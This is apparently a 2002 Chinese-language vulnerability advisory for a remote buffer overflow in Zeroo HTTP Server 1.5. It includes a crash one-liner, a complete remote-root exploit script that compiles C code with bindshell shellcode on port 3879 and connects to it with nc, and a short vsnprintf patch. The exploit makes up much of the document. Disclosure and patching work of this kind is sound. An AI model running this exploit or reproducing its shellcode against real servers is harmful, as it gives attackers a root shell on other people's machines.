Lonerunner Zeroo HTTP Server存在远程缓冲溢出问题发布时间:2002-11-21 更新时间:2002-11-21 严重程度:高 威胁程度:普通用户访问权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:6190 受影响系统 Lonerunner Zeroo HTTP Server 1.5详细描述 Zeroo HTTP是免费开放源代码WEB程序。 Zeroo HTTP对部分超长请求检查不正确,超长的字符串请求可导致WEB服务产生缓冲溢出,可以覆盖堆栈内容执行任意代码。 测试代码 bash$ (echo "`perl -e 'print \"\xaa\"x1024'`";cat)|nc 0 8000 # 0xaa,0xff,etc... #!/bin/sh # # 0x82-Zer00.sh Zeroo HTTP Server Remote root exploit for Linux # # __ # exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. # My World: http://x82.i21c.net # (printf "\n 0x82-Zer00.sh Zeroo HTTP Server Remote root exploit"); (printf "\n by x82 in INetCop(c)\n\n"); # if [ "$2" = "" ]; then (printf " Usage: 0x82-Zer00.sh [hostname] [port]\n\n"); exit; fi # cat >0x82-Remote-Zeroosubugxpl.c<< X82X82 #define Xpl017Elz x82 int main(/* args? */) { int num; char b1ndsh[] = /* Linux(x86) bindshell on port 3879 */ "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"; for(num=0;num<0xa4;num+=4) printf("\xc0\xf4\xff\xbf"); // this's &shellcode for(num=0;num<0x02a8-strlen(b1ndsh);num++) printf("N"); /* nop...NNNNNNNNNNNNN...NNNNNNNNNNNNN;;; */ printf("%s",b1ndsh); /* shellcode */ for(num=0;num<0xb4;num++) printf("\xff"); /* byteother */ printf("\r\n"); } X82X82 # (printf " { 0x00. Compile exploit. }\n"); make 0x82-Remote-Zeroosubugxpl (printf " { 0x01. Send code ! }\n"); (./0x82-Remote-Zeroosubugxpl;cat)|nc $1 $2 & (printf " { 0x02. OK, Try $1:3879 ... }\n"); nc $1 3879 (printf " { 0x03. Connection closed. }\n"); # (printf " { 0x04. Delete exploit code. }\n"); rm -f 0x82-Remote-Zeroosubugxpl* (printf " { 0x05. End :-}\n\n"); # 解决方案 临时"dong-h0un U" <xploit@hackermail.com>提供的补丁: === http.patch === --- http.cpp Fri Apr 12 13:26:24 2002 +++ http.patch.cpp Tue Nov 10 00:28:13 2002 @@ -70,7 +70,7 @@ va_list arglist; va_start(arglist, message); - vsprintf(buffer, message, arglist); + vsnprintf(buffer, MAX_CONN_BUF, message, arglist); va_end(arglist); strncpy(in+strlen(in), buffer, strlen(buffer)); === eof === 相关信息 dong-h0un U <xploit@hackermail.com>. 参考:http://online.securityfocus.com/archive/1/300066 |
